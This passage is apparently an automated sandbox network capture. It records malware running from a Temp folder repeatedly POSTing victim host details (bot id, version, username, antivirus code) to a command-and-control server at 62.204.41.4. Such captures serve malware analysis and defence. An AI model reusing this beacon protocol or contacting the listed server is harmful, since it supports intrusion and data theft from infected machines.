                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:40.353945017 CET261INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      147192.168.2.74984262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:40.535002947 CET262OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:40.598506927 CET262INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      148192.168.2.74984362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:40.769583941 CET263OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:40.833797932 CET263INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      149192.168.2.74984462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:41.013550043 CET264OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:41.078934908 CET264INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      15192.168.2.74970962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:05.205403090 CET119OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:05.269750118 CET119INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      150192.168.2.74984562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:41.253266096 CET265OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:41.315891981 CET265INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      151192.168.2.74984662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:41.490813017 CET266OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:41.555815935 CET266INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      152192.168.2.74984762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:41.745093107 CET267OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:41.808494091 CET267INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      153192.168.2.74984862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:41.988753080 CET268OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:42.053529978 CET268INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      154192.168.2.74984962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:42.221379995 CET269OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:42.285451889 CET269INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      155192.168.2.74985062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:42.466685057 CET270OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:42.530186892 CET270INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      156192.168.2.74985162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:42.712678909 CET271OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:42.774888039 CET271INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      157192.168.2.74985262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:42.945715904 CET272OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:43.009648085 CET272INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      158192.168.2.74985362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:43.194714069 CET273OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:43.259275913 CET273INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      159192.168.2.74985462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:43.442984104 CET274OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:43.506808996 CET274INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      16192.168.2.74971062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:05.446085930 CET120OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:05.508915901 CET120INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      160192.168.2.74985562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:43.680991888 CET275OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:43.744910002 CET275INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      161192.168.2.74985662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:43.927942991 CET276OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:43.990817070 CET276INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      162192.168.2.74985762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:44.177016020 CET277OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:44.241430998 CET277INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      163192.168.2.74985862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:44.420397997 CET278OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:44.483531952 CET278INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
